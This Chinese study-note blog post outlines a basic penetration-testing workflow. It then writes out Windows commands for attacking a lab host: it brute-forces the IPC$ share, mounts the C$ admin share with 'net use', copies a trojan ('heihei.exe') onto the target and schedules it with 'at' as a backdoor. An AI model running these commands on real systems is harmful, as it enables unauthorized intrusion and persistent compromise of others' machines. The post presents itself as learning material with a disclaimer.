网络安全学习篇14_简单渗透测试

上一篇博客：PKI

声明

此博客为笔记类博客，为简单的渗透测试流程，旨在了解渗透原理，不涉及任何非法操作。

目录

简单渗透测试流程

1. 授权
2. 信息收集
3. 扫描漏洞
4. 漏洞利用
5. 其他操作
6. 渗透测试报告

其他

开始

1. 授权
   开始渗透测试前，要先得到公司或个人服务器管理员的授权

2. 信息收集
   nslookup whois

3. 扫描漏洞

nmap—>ip范围 —>端口 如80（IIS，apache，网站类型）
scanport 高级扫描：如IIS漏洞2003-IIS6.0 2008IIS7.0
扫描网站漏洞

4. 漏洞利用
   提权（shell、DOS环境、桌面环境、最高权限）

5. 其他操作
   日志文件、后门

6. 渗透测试报告
   写出渗透测试报告，涉及哪些方面存在漏洞及漏洞级别

其他

0. 测试开放端口

手工测试：telnet IP地址 测试端口

工具测试：scanport 扫描端口

1. 漏洞利用之共享端口445IPC$

• 工具NTscan
• 社会工程学之密码字典

net use  \\10.1.1.2\ipc$ 密码 /user:用户

net use f: \\10.1.1.2\share 密码 /user:用户

net use f: /del

net use * /del

net use f: \\10.1.1.2\c$ 密码 /user:用户

2. 制作mm

利用光盘上的hgz软件

3. mm留后门

copy d:\heihei.exe \\10.1.1.2\c$

4. 设置计划任务自动执行：

net time \\10.1.1.2
at \\10.1.1.2 11:11 "c:\heihei.exe"

5. 等待rj上线

参考：B站千峰